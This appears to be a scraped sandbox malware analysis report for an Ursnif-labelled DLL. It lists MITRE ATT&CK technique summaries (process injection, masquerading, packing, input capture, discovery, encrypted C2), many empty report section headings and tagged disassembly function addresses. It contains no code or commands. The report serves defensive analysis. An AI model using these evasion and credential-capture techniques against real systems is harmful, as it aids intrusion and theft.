Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report nT5pUwoJSS.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 6D481237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 6D481F56, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6D48179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6D4810E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 6D48173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6D481CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 6D4817FA, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6D4823A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 6D482184, Relevance: .1, Instructions: 77
COMMONCrypto

Function 6D481352, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6D48150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON